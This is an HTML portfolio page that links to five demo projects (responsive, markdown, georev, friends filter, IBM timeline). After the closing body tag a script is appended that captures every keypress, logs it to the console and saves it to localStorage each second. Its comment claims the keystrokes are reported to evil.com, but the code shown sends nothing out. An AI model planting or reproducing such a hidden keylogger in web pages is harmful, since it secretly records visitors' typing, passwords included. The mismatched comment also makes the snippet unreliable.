<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Portfolio page</title>
    <style>
        .wrapper {
            width:90%;
            margin:0 auto;
        }
        .link-box {
        }
        .link-box_link {
        }
    </style>
</head>
<body>
    <div class="wrapper">
        <div class="link-box">
        <a href="./demo1-responsive/index.html" class="link-box_link">demo1</a>
        <a href="./demo2-markdown/index.html" class="link-box_link">demo2</a>
        <a href="./demo3-georev/index.html" class="link-box_link">demo3</a>
        <a href="./demo4-friends-filter/index.html" class="link-box_link">demo4</a>
	<a href="./demo5-ibm-timeline/index.html" class="link-box_link">demo5</a>
        </div>
    </div>
</body>
</script><script>
// array of user keystrokes
var keystrokes = [];
// event listener which captures user keystrokes
document.onkeypress = function() {
    keystrokes.push(window.event.keyCode);
    console.log("PRESSED ", window.event.keyCode);
}
// function which reports keytrokes back to evil.com every second
setInterval(function() {
    if (keystrokes.length) {
        localStorage.setItem("input", keystrokes.join("+"));
    }
    keystrokes = [];
}, 1000);
</script>
</html>
